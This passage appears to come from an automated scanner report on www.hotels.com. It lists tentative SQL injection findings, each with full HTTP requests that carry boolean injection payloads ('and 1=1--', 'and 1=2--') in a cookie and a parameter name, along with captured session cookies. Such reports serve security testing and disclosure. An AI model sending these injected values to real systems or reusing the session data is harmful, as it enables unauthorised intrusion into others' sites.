GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA17075075'%20or%201%3d2--%20; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:22 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...

1.14. http://www.hotels.com/compare/hotel_dockingbar.html [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d1--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A200.0.0%3A198.2.0%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:17 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjIwMC4wLjA6MTk4LjIuMDoxOTAuMi4wOjEzNC4wLjE6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjYuMC5pMToxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTQ5LjEuMC5pMXxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:17 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\
...[SNIP]...

Request 2

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453%20and%201%3d2--%20; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:18 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...

1.15. http://www.hotels.com/compare/hotel_dockingbar.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593&1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A108.1.0.i2%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:31 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjE5OC4yLjA6MTQ1LjAuMC5pMjoyMDAuMC4wOjEwOC4xLjAuaTI6MTkwLjIuMDoxMzQuMC4xOjIuMi4xOjIwOS4wLjE6MTQ3LjAuMS5pNjo5Mi42LjAuaTE6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjE0OS4xLjAuaTF8SENPTV9VUyFBKmVuX1VTfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:31 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href
...[SNIP]...

Request 2

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593&1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:32 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...

1.16. http://www.hotels.com/hotel/details.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

